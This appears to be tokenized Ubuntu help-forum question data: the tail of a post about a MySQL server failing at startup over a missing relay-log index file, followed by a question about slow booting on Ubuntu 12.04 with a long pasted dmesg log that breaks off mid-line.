14:52:57 [ note ] plugin 'federated ' is disabled . 130917 14:52:57 innodb : the innodb memory heap is disabled 130917 14:52:57 innodb : mutexes and rw_locks use gcc atomic builtins 130917 14:52:57 innodb : compressed tables use zlib 1.2.3.4 130917 14:52:57 innodb : initializing buffer pool , size = 128.0m 130917 14:52:57 innodb : completed initialization of buffer pool 130917 14:52:57 innodb : highest supported file format is barracuda . 130917 14:52:58 innodb : waiting for the background threads to start 130917 14:52:59 innodb : 1.1.8 started ; log sequence number 477426000 130917 14:52:59 [ warning ] neither -- relay-log nor -- relay-log-index were used ; so replication may break when this mysql server acts as a slave and has his hostname changed ! ! please use ' -- relay-log=dev-relay-bin ' to avoid this problem . 130917 14:52:59 [ error ] /usr/sbin/mysqld : file './dev-relay-bin.index ' not found ( errcode : 13 ) 130917 14:52:59 [ error ] failed in open_log ( ) called from init_relay_log_info ( ) 130917 14:52:59 [ error ] failed to initialize the master info structure 130917 14:52:59 innodb : starting shutdown ... 130917 14:52:59 innodb : shutdown completed ; log sequence number 477426000 start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . jm @ dev : /var/log $ any suggestions on how to fix would be appreciated !
346782	ubuntu 12.04 boots very slow	i 've been using ubuntu since version 10.04 and so far i was never in a situation i could not solve on my own googling other people 's questions . in this case , there seem to be such a variety of reasons for ubuntu starting slow that it 's hard for me to find the solution . i have ubuntu 12.04 installed on a samsung rc530 laptop the problem is the following : it takes several minutes for ubuntu to start ( first until the login appears and then until it loads , being the first one the slowest ) i 've checked a couple of questions including http : //ubuntuforums.org/archive/index.php/t-2137435.html but i 'm still not sure if i have the same problem ( that 's what i 'm trying to figure out ! ) in order to speed up the answers here goes the output of dmesg : [ 2.179793 ] pci 0000:00:01.0 : bridge window [ mem 0xf5000000-0xf60fffff ] [ 2.179797 ] pci 0000:00:01.0 : bridge window [ mem 0xe0000000-0xf1ffffff 64bit pref ] [ 2.179802 ] pci 0000:00:1c.0 : pci bridge to [ bus 02-02 ] [ 2.179806 ] pci 0000:00:1c.0 : bridge window [ io 0xc000-0xcfff ] [ 2.179812 ] pci 0000:00:1c.0 : bridge window [ mem 0xf7200000-0xf7bfffff ] [ 2.179817 ] pci 0000:00:1c.0 : bridge window [ mem 0xf2c00000-0xf35fffff 64bit pref ] [ 2.179825 ] pci 0000:00:1c.3 : pci bridge to [ bus 03-03 ] [ 2.179829 ] pci 0000:00:1c.3 : bridge window [ io 0xb000-0xbfff ] [ 2.179835 ] pci 0000:00:1c.3 : bridge window [ mem 0xf6800000-0xf71fffff ] [ 2.179841 ] pci 0000:00:1c.3 : bridge window [ mem 0xf2100000-0xf2afffff 64bit pref ] [ 2.179858 ] pci 0000:00:01.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 2.179862 ] pci 0000:00:01.0 : setting latency timer to 64 [ 2.179870 ] pci 0000:00:1c.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 2.179875 ] pci 0000:00:1c.0 : setting latency timer to 64 [ 2.179886 ] pci 0000:00:1c.3 : pci int d - > gsi 19 ( level , low ) - > irq 19 [ 2.179891 ] pci 0000:00:1c.3 : setting latency timer to 64 [ 2.179896 ] pci_bus 0000:00 : resource 4 [ io 0x0000-0x0cf7 ] [ 2.179899 ] pci_bus 0000:00 : resource 5 [ io 0x0d00-0xffff ] [ 2.179901 ] pci_bus 0000:00 : resource 6 [ mem 0x000a0000-0x000bffff ] [ 2.179904 ] pci_bus 0000:00 : resource 7 [ mem 0x000d0000-0x000d3fff ] [ 2.179906 ] pci_bus 0000:00 : resource 8 [ mem 0x000d4000-0x000d7fff ] [ 2.179908 ] pci_bus 0000:00 : resource 9 [ mem 0x000d8000-0x000dbfff ] [ 2.179911 ] pci_bus 0000:00 : resource 10 [ mem 0x000dc000-0x000dffff ] [ 2.179913 ] pci_bus 0000:00 : resource 11 [ mem 0x000e0000-0x000e3fff ] [ 2.179916 ] pci_bus 0000:00 : resource 12 [ mem 0x000e4000-0x000e7fff ] [ 2.179918 ] pci_bus 0000:00 : resource 13 [ mem 0xcfa00000-0xfeafffff ] [ 2.179920 ] pci_bus 0000:01 : resource 0 [ io 0xd000-0xdfff ] [ 2.179923 ] pci_bus 0000:01 : resource 1 [ mem 0xf5000000-0xf60fffff ] [ 2.179925 ] pci_bus 0000:01 : resource 2 [ mem 0xe0000000-0xf1ffffff 64bit pref ] [ 2.179928 ] pci_bus 0000:02 : resource 0 [ io 0xc000-0xcfff ] [ 2.179930 ] pci_bus 0000:02 : resource 1 [ mem 0xf7200000-0xf7bfffff ] [ 2.179933 ] pci_bus 0000:02 : resource 2 [ mem 0xf2c00000-0xf35fffff 64bit pref ] [ 2.179935 ] pci_bus 0000:03 : resource 0 [ io 0xb000-0xbfff ] [ 2.179938 ] pci_bus 0000:03 : resource 1 [ mem 0xf6800000-0xf71fffff ] [ 2.179940 ] pci_bus 0000:03 : resource 2 [ mem 0xf2100000-0xf2afffff 64bit pref ] [ 2.179969 ] net : registered protocol family 2 [ 2.180023 ] ip route cache hash table entries : 32768 ( order : 5 , 131072 bytes ) [ 2.180170 ] tcp established hash table entries : 131072 ( order : 8 , 1048576 bytes ) [ 2.180418 ] tcp bind hash table entries : 65536 ( order : 7 , 524288 bytes ) [ 2.180530 ] tcp : hash tables configured ( established 131072 bind 65536 ) [ 2.180532 ] tcp reno registered [ 2.180535 ] udp hash table entries : 512 ( order : 2 , 16384 bytes ) [ 2.180540 ] udp-lite hash table entries : 512 ( order : 2 , 16384 bytes ) [ 2.180598 ] net : registered protocol family 1 [ 2.180611 ] pci 0000:00:02.0 : boot video device [ 2.180623 ] pci 0000:00:1a.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 2.180649 ] pci 0000:00:1a.0 : pci int a disabled [ 2.180671 ] pci 0000:00:1d.0 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 2.180689 ] pci 0000:00:1d.0 : pci int a disabled [ 2.180741 ] pci : cls 64 bytes , default 64 [ 2.181446 ] audit : initializing netlink socket ( disabled ) [ 2.181454 ] type=2000 audit ( 1379439860.948:1 ) : initialized [ 2.205653 ] highmem bounce pool size : 64 pages [ 2.205658 ] hugetlb registered 2 mb page size , pre-allocated 0 pages [ 2.207801 ] vfs : disk quotas dquot_6.5.2 [ 2.207857 ] dquot-cache hash table entries : 1024 ( order 0 , 4096 bytes ) [ 2.208374 ] fuse init ( api version 7.17 ) [ 2.208465 ] msgmni has been set to 1641 [ 2.208819 ] block layer scsi generic ( bsg ) driver version 0.4 loaded ( major 253 ) [ 2.208846 ] io scheduler noop registered [ 2.208848 ] io scheduler deadline registered [ 2.208854 ] io scheduler cfq registered ( default ) [ 2.208937 ] pcieport 0000:00:01.0 : setting latency timer to 64 [ 2.208965 ] pcieport 0000:00:01.0 : irq 40 for msi/msi-x [ 2.209127 ] pci_hotplug : pci hot plug pci core version : 0.5 [ 2.209148 ] pciehp : pci express hot plug controller driver version : 0.4 [ 2.209223 ] intel_idle : mwait substates : 0x21120 [ 2.209225 ] intel_idle : v0.4 model 0x2a [ 2.209226 ] intel_idle : lapic_timer_reliable_states 0xffffffff [ 2.209302 ] acpi : deprecated procfs i/f for ac is loaded , please retry with config_acpi_procfs_power cleared [ 2.209345 ] acpi : ac adapter [ adp1 ] ( off-line ) [ 2.209449 ] input : lid switch as /devices/lnxsystm:00/lnxsybus:00/pnp0c0d:00/input/input0 [ 2.209466 ] acpi : lid switch [ lid0 ] [ 2.209508 ] input : power button as /devices/lnxsystm:00/lnxsybus:00/pnp0c0c:00/input/input1 [ 2.209526 ] acpi : power button [ pwrb ] [ 2.209567 ] input : sleep button as /devices/lnxsystm:00/lnxsybus:00/pnp0c0e:00/input/input2 [ 2.209570 ] acpi : sleep button [ slpb ] [ 2.209610 ] input : power button as /devices/lnxsystm:00/lnxpwrbn:00/input/input3 [ 2.209613 ] acpi : power button [ pwrf ] [ 2.209676 ] acpi : fan [ fan0 ] ( off ) [ 2.209707 ] acpi : fan [ fan1 ] ( off ) [ 2.220946 ] acpi : invalid active2 threshold [ 2.225811 ] thermal lnxtherm:00 : registered as thermal_zone0 [ 2.225817 ] acpi : thermal zone [ tz00 ] ( 51 c ) [ 2.235815 ] thermal lnxtherm:01 : registered as thermal_zone1 [ 2.235821 ] acpi : thermal zone [ tz01 ] ( 51 c ) [ 2.235871 ] acpi : deprecated procfs i/f for battery is loaded , please retry with config_acpi_procfs_power cleared [ 2.235879 ] acpi : battery slot [ bat1 ] ( battery present ) [ 2.235906 ] erst : table is not found ! [ 2.235908 ] ghes : hest is not enabled ! [ 2.235952 ] isapnp : scanning for pnp cards ... [ 2.235976 ] serial : 8250/16550 driver , 32 ports , irq sharing enabled [ 2.261813 ] acpi : battery slot [ bat1 ] ( battery present ) [ 2.589891 ] isapnp : no plug & play device found [ 2.605908 ] linux agpgart interface v0.103 [ 2.606002 ] agpgart-intel 0000:00:00.0 : intel sandybridge chipset [ 2.606103 ] agpgart-intel 0000:00:00.0 : detected gtt size : 2097152k total , 262144k mappable [ 2.607580 ] agpgart-intel 0000:00:00.0 : detected 65536k stolen memory [ 2.607711 ] agpgart-intel 0000:00:00.0 : agp aperture is 256m @ 0xd0000000 [ 2.609266 ] brd : module loaded [ 2.610051 ] loop : module loaded [ 2.610176 ] ahci 0000:00:1f.2 : version 3.0 [ 2.610189 ] ahci 0000:00:1f.2 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 2.610245 ] ahci 0000:00:1f.2 : irq 41 for msi/msi-x [ 2.625436 ] ahci 0000:00:1f.2 : ahci 0001.0300 32 slots 6 ports 6 gbps 0x5 impl sata mode [ 2.625446 ] ahci 0000:00:1f.2 : flags : 64bit ncq sntf pm led clo pio slum part ems apst [ 2.625457 ] ahci 0000:00:1f.2 : setting latency timer to 64 [ 2.633980 ] scsi0 : ahci [ 2.634062 ] scsi1 : ahci [ 2.634131 ] scsi2 : ahci [ 2.634198 ] scsi3 : ahci [ 2.634267 ] scsi4 : ahci [ 2.634333 ] scsi5 : ahci [ 2.634435 ] ata1 : sata max udma/133 abar m2048 @ 0xf7c06000 port 0xf7c06100 irq 41 [ 2.634438 ] ata2 : dummy [ 2.634441 ] ata3 : sata max udma/133 abar m2048 @ 0xf7c06000 port 0xf7c06200 irq 41 [ 2.634443 ] ata4 : dummy [ 2.634444 ] ata5 : dummy [ 2.634446 ] ata6 : dummy [ 2.634810 ] fixed mdio bus : probed [ 2.634830 ] tun : universal tun/tap device driver , 1.6 [ 2.634832 ] tun : ( c ) 1999-2004 max krasnyansky < maxk @ qualcomm.com > [ 2.634882 ] ppp generic driver version 2.4.2 [ 2.634978 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 2.634993 ] ehci_hcd 0000:00:1a.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 2.635009 ] ehci_hcd 0000:00:1a.0 : setting latency timer to 64 [ 2.635013 ] ehci_hcd 0000:00:1a.0 : ehci host controller [ 2.635058 ] ehci_hcd 0000:00:1a.0 : new usb bus registered , assigned bus number 1 [ 2.635084 ] ehci_hcd 0000:00:1a.0 : debug port 2 [ 2.638952 ] ehci_hcd 0000:00:1a.0 : cache line size of 64 is not supported [ 2.638968 ] ehci_hcd 0000:00:1a.0 : irq 16 , io mem 0xf7c08000 [ 2.653401 ] ehci_hcd 0000:00:1a.0 : usb 2.0 started , ehci 1.00 [ 2.653599 ] hub 1-0:1.0 : usb hub found [ 2.653603 ] hub 1-0:1.0 : 2 ports detected [ 2.653663 ] ehci_hcd 0000:00:1d.0 : pci int a - > gsi 23 ( level , low ) - > irq 23 [ 2.653679 ] ehci_hcd 0000:00:1d.0 : setting latency timer to 64 [ 2.653682 ] ehci_hcd 0000:00:1d.0 : ehci host controller [ 2.653725 ] ehci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 2.653747 ] ehci_hcd 0000:00:1d.0 : debug port 2 [ 2.657622 ] ehci_hcd 0000:00:1d.0 : cache line size of 64 is not supported [ 2.657637 ] ehci_hcd 0000:00:1d.0 : irq 23 , io mem 0xf7c07000 [ 2.673395 ] ehci_hcd 0000:00:1d.0 : usb 2.0 started , ehci 1.00 [ 2.673575 ] hub 2-0:1.0 : usb hub found [ 2.673578 ] hub 2-0:1.0 : 2 ports detected [ 2.673635 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 2.673647 ] uhci_hcd : usb universal host controller interface driver [ 2.673692 ] usbcore : registered new interface driver libusual [ 2.673743 ] i8042 : pnp : ps/2 controller [ pnp0303 : ps2k , pnp0f13 : psm1 ] at 0x60,0x64 irq 1,12 [ 2.677220 ] serio : i8042 kbd port at 0x60,0x64 irq 1 [ 2.677226 ] serio : i8042 aux port at 0x60,0x64 irq 12 [ 2.677344 ] mousedev : ps/2 mouse device common for all mice [ 2.677670 ] rtc_cmos 00:08 : rtc core : registered rtc_cmos as rtc0 [ 2.677710 ] rtc0 : alarms up to one year , y3k , 242 bytes nvram , hpet irqs [ 2.677764 ] device-mapper : uevent : version 1.0.3 [ 2.677833 ] device-mapper : ioctl : 4.22.0-ioctl ( 2011-10-19 ) initialised : dm-devel @ redhat.com [ 2.677851 ] eisa : probing bus 0 at eisa.0 [ 2.677852 ] eisa : can not allocate resource for mainboard [ 2.677855 ] can not allocate resource for eisa slot 1 [ 2.677856 ] can not allocate resource for eisa slot 2 [ 2.677858 ] can not allocate resource for eisa slot 3 [ 2.677860 ] can not allocate resource for eisa slot 4 [ 2.677862 ] can not allocate resource for eisa slot 5 [ 2.677864 ] can not allocate resource for eisa slot 6 [ 2.677865 ] can not allocate resource for eisa slot 7 [ 2.677867 ] can not allocate resource for eisa slot 8 [ 2.677869 ] eisa : detected 0 cards . [ 2.677877 ] cpufreq-nforce2 : no nforce2 chipset . [ 2.678169 ] cpuidle : using governor ladder [ 2.678638 ] cpuidle : using governor menu [ 2.678640 ] efi variables facility v0.08 2004-may-17 [ 2.678827 ] tcp cubic registered [ 2.678941 ] net : registered protocol family 10 [ 2.679394 ] net : registered protocol family 17 [ 2.679398 ] registering the dns_resolver key type [ 2.679412 ] using ipi no-shortcut mode [ 2.679551 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input4 [ 2.679690 ] pm : hibernation image not present or could not be loaded . [ 2.679704 ] registered taskstats version 1 [ 2.688439 ] magic number : 13:782:744 [ 2.688564 ] rtc_cmos 00:08 : setting system clock to 2013-09-17 17:44:21 utc ( 1379439861 ) [ 2.691059 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 2.691061 ] edd information not available . [ 2.953409 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 2.953452 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 2.955385 ] ata3.00 : atapi : optiarc dvd rw ad-7717h , 1.x0 , max udma/100 [ 2.957597 ] ata3.00 : configured for udma/100 [ 2.959726 ] ata1.00 : ata-8 : samsung hm641ji , 2aj10002 , max udma/133 [ 2.959730 ] ata1.00 : 1250263728 sectors , multi 16 : lba48 ncq ( depth 31/32 ) , aa [ 2.965402 ] usb 1-1 : new high-speed usb device number 2 using ehci_hcd [ 2.966087 ] ata1.00 : configured for udma/133 [ 2.966251 ] scsi 0:0:0:0 : direct-access ata samsung hm641ji 2aj1 pq : 0 ansi : 5 [ 2.966416 ] sd 0:0:0:0 : [ sda ] 1250263728 512-byte logical blocks : ( 640 gb/596 gib ) [ 2.966470 ] sd 0:0:0:0 : [ sda ] write protect is off [ 2.966475 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 2.966493 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 [ 2.966500 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 2.967315 ] scsi 2:0:0:0 : cd-rom optiarc dvd rw ad-7717h 1.x0 pq : 0 ansi : 5 [ 2.969511 ] sr0 : scsi3-mmc drive : 16x/16x writer dvd-ram cd/rw xa/form2 cdda tray [ 2.969515 ] cdrom : uniform cd-rom driver revision : 3.20 [ 2.969656 ] sr 2:0:0:0 : attached scsi cd-rom sr0 [ 2.969798 ] sr 2:0:0:0 : attached scsi generic sg1 type 5 [ 3.027501 ] sda : sda1 sda2 < sda5 > [ 3.028201 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 3.028474 ] freeing unused kernel memory : 744k freed [ 3.028720 ] write protecting the kernel text : 5840k [ 3.028779 ] write protecting the kernel read-only data : 2388k [ 3.028781 ] nx-protecting the kernel data : 4400k [ 3.047033 ] udevd [ 125 ] : starting version 175 [ 3.065860 ] r8169 gigabit ethernet driver 2.3lk-napi loaded [ 3.065889 ] r8169 0000:03:00.0 : pci int a - > gsi 19 ( level , low ) - > irq 19 [ 3.065940 ] r8169 0000:03:00.0 : setting latency timer to 64 [ 3.066049 ] r8169 0000:03:00.0 : irq 42 for msi/msi-x [ 3.066590 ] r8169 0000:03:00.0 : eth0 : rtl8168evl/8111evl at 0xf842e000 , e8:11:32:9d : e7:67 , xid 0c900800 irq 42 [ 3.066594 ] r8169 0000:03:00.0 : eth0 : jumbo features [ frames : 9200 bytes , tx checksumming : ko ] [ 3.098171 ] hub 1-1:1.0 : usb hub found [ 3.098259 ] hub 1-1:1.0 : 6 ports detected [ 3.177311 ] refined tsc clocksource calibration : 1995.467 mhz . [ 3.177325 ] switching to clocksource tsc [ 3.209235 ] usb 2-1 : new high-speed usb device number 2 using ehci_hcd [ 3.336649 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 3.341864 ] hub 2-1:1.0 : usb hub found [ 3.341946 ] hub 2-1:1.0 : 6 ports detected [ 3.413306 ] usb 1-1.4 : new high-speed usb device number 3 using ehci_hcd [ 16.850061 ] adding 4103164k swap on /dev/sda5 . priority : -1 extents:1 across:4103164k [ 16.854512 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 16.899617 ] udevd [ 355 ] : starting version 175 [ 16.937304 ] mei : module is from the staging directory , the quality is unknown , you have been warned . [ 16.937712 ] mei 0000:00:16.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 16.937722 ] mei 0000:00:16.0 : setting latency timer to 64 [ 16.937812 ] mei 0000:00:16.0 : irq 43 for msi/msi-x [ 16.942855 ] [ drm ] initialized drm 1.1.0 20060810 [ 16.944192 ] lp : driver loaded but no devices found [ 16.947101 ] cfg80211 : calling crda to update world regulatory domain [ 16.952954 ] linux video capture interface : v2.00 [ 16.959037 ] uvcvideo : found uvc 1.00 device webcam scb-1100n ( 2232:1008 ) [ 16.965329 ] wmi : mapper loaded [ 16.966159 ] intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 16.966164 ] copyright ( c ) 2003-2011 intel corporation [ 16.966253 ] iwlwifi 0000:02:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 16.966294 ] iwlwifi 0000:02:00.0 : setting latency timer to 64 [ 16.966341 ] iwlwifi 0000:02:00.0 : pci_resource_len = 0x00002000 [ 16.966344 ] iwlwifi 0000:02:00.0 : pci_resource_base = f8450000 [ 16.966347 ] iwlwifi 0000:02:00.0 : hw revision id = 0x0 [ 16.966538 ] iwlwifi 0000:02:00.0 : irq 44 for msi/msi-x [ 16.966652 ] iwlwifi 0000:02:00.0 : detected intel ( r ) centrino ( r ) wireless-n 100 bgn , rev=0x6c [ 16.966780 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s [ 16.966834 ] i915 0000:00:02.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 16.966864 ] i915 0000:00:02.0 : setting latency timer to 64 [ 16.987505 ] input : webcam scb-1100n as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4/1-1.4:1.0/input/input5 [ 16.987617 ] usbcore : registered new interface driver uvcvideo [ 16.987621 ] usb video class driver ( 1.1.1 ) [ 16.987986 ] iwlwifi 0000:02:00.0 : device eeprom ver=0x166 , calib=0x6 [ 16.987991 ] iwlwifi 0000:02:00.0 : device sku : 0x50 [ 16.987995 ] iwlwifi 0000:02:00.0 : valid tx ant : 0x1 , valid rx ant : 0x3 [ 16.988020 ] iwlwifi 0000:02:00.0 : tunable channels : 13 802.11bg , 0 802.11a channels [ 17.004730 ] type=1400 audit ( 1379439875.812:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=399 comm= '' apparmor_parser '' [ 17.005197 ] type=1400 audit ( 1379439875.816:3 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=399 comm= '' apparmor_parser '' [ 17.005456 ] type=1400 audit ( 1379439875.816:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=399 comm= '' apparmor_parser '' [ 17.022616 ] i915 0000:00:02.0 : irq 45 for msi/msi-x [ 17.022623 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 17.022626 ] [ drm ] driver supports precise vblank timestamp query . [ 17.024659 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=io+mem : owns=io+mem [ 17.083068 ] cfg80211 : world regulatory domain updated : [ 17.083071 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 17.083075 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 17.083077 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 17.083080 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 17.083082 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 17.083085 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 17.138997 ] iwlwifi 0000:02:00.0 : loaded firmware version 39.31.5.1 build 32895 [ 17.139130 ] registered led device : phy0-led [ 17.139157 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 17.141963 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 17.219123 ] psmouse serio1 : elantech : assuming hardware version 3 ( with firmware version 0x450f00 ) [ 17.234753 ] psmouse serio1 : elantech : synaptics capabilities query result 0x08 , 0x15 , 0x0c . [ 17.310576 ] input : etps/2 elantech touchpad as /devices/platform/i8042/serio1/input/input6 [ 17.387049 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro [ 17.596751 ] init : failsafe main process ( 799 ) killed by term signal [ 17.663112 ] bluetooth : core ver 2.16 [ 17.663131 ] net : registered protocol family 31 [ 17.663134 ] bluetooth : hci device and connection manager initialized [ 17.663136 ] bluetooth : hci socket layer initialized [ 17.663138 ] bluetooth : l2cap socket layer initialized [ 17.663143 ] bluetooth : sco socket layer initialized [ 17.664970 ] bluetooth : rfcomm tty layer initialized [ 17.664976 ] bluetooth : rfcomm socket layer initialized [ 17.664979 ] bluetooth : rfcomm ver 1.11 [ 17.702613 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 17.702618 ] bluetooth : bnep filters : protocol multicast [ 17.724173 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s [ 17.767015 ] ppdev : user-space parallel port driver [ 17.780522 ] type=1400 audit ( 1379439876.588:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=884 comm= '' apparmor_parser '' [ 17.781077 ] type=1400 audit ( 1379439876.592:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=884 comm= '' apparmor_parser '' [ 17.787759 ] iwlwifi 0000:02:00.0 : l1 enabled ; disabling l0s [ 17.796641 ] type=1400 audit ( 1379439876.608:7 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/mysqld '' pid=915 comm= '' apparmor_parser '' [ 17.797352 ] type=1400 audit ( 1379439876.608:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=910 comm= '' apparmor_parser '' [ 17.797931 ] type=1400 audit ( 1379439876.608:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=909 comm= '' apparmor_parser '' [ 17.797963 ] type=1400 audit ( 1379439876.608:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=913 comm= '' apparmor_parser '' [ 17.797976 ] type=1400 audit ( 1379439876.608:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=910 comm= '' apparmor_parser '' [ 17.853483 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 17.853899 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 17.886155 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 17.886264 ] console : switching to colour frame buffer device 170x48 [ 17.886305 ] fb0 : inteldrmfb frame buffer device [ 17.886307 ] drm : registered panic notifier [ 17.886518 ] [ firmware bug ] : acpi ( pegp ) defines _dod but not _dos [ 17.937589 ] r8169 0000:03:00.0 : eth0 : link down [ 17.937756 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 17.938206 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 17.982258 ] acpi device:46 : registered as cooling_device10 [ 17.982474 ] input : video bus as /devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/device:44/lnxvideo:00/input/input7 [ 17.982543 ] acpi : video device [ pegp ] ( multi-head : yes rom : yes post : no ) [ 17.984072 ] acpi device:50 : registered as cooling_device11 [ 17.984266 ] input : video bus as /devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/lnxvideo:01/input/input8 [ 17.984318 ] acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) [ 17.984361 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 17.984411 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 [ 17.984494 ] snd_hda_intel 0000:00:1b.0 : irq 46 for msi/msi-x [ 17.984544 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 [ 18.082992 ] init : alsa-restore main process ( 973 ) terminated with status 19 [ 18.534018 ] hdmi status : codec=3 pin=5 presence_detect=0 eld_valid=0 [ 18.534100 ] input : hda intel pch hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 18.534195 ] input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 18.534293 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input11 [ 19.065605 ] init : anacron main process ( 1008 ) killed by term signal [ 19.141327 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 16000000 , was 12060000 [ 19.380338 ] cfg80211 : found new beacon on frequency : 2467 mhz ( ch 12 ) on phy0 [ 19.854517 ] bbswitch : version 0.7 [ 19.854525 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 19.854532 ] bbswitch : found discrete vga device 0000:01:00.0 : \_sb_.pci0.peg0.pegp [ 19.854624 ] bbswitch : detected an optimus _dsm function [ 19.854636 ] pci 0000:01:00.0 : power state changed by acpi to d0 [ 19.854640 ] pci 0000:01:00.0 : power state changed by acpi to d0 [ 19.854648 ] pci 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 19.854651 ] bbswitch : succesfully loaded . discrete card 0000:01:00.0 is on [ 19.856807 ] bbswitch : disabling discrete graphics [ 19.857055 ] pci 0000:01:00.0 : pci int a disabled [ 19.889866 ] pci 0000:01:00.0 : power state changed by acpi to d3 [ 20.104606 ] wlan0 : authenticate with 84 : a8 : e4:65:51 : c4 ( try 1 ) [ 20.107420 ] wlan0 : authenticated [ 20.121233 ] wlan0 : associate with 84 : a8 : e4:65:51 : c4 ( try 1 ) [ 20.126503 ] wlan0 : rx assocresp from 84 : a8 : e4:65:51 : c4 ( capab=0x411 status=0 aid=1 ) [ 20.126511 ] wlan0 : associated [ 20.133857 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 31.916932 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 160d0000 , was 16000000 [ 60.834851 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 000d0000 , was 160d0000 [ 126.255771 ] usb 2-1.2 : new full-speed usb device number 3 using ehci_hcd [ 126.365060 ] usbcore : registered new interface driver usbhid [ 126.365067 ] usbhid : usb hid core driver [ 126.371346 ] logitech-djreceiver 0003:046d : c52b.0003 : hiddev0 , hidraw0 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:1d.0-1.2/input2 [ 126.374198 ] input : logitech unifying device . wireless pid:1024 as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.2/0003:046d : c52b.0003/input/input12 [ 126.374345 ] logitech-djdevice 0003:046d : c52b.0004 : input , hidraw1 : usb hid v1.11 mouse [ logitech unifying device . wireless pid:1024 ] on usb-0000:00:1d.0-1.2:1 [ 126.376692 ] input : logitech unifying device . wireless pid:2011 as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.2/0003:046d : c52b.0003/input/input13 [ 126.376879 ] logitech-djdevice 0003:046d : c52b.0005 : input , hidraw2 : usb hid v1.11 keyboard [ logitech unifying device . wireless pid:2011 ] on 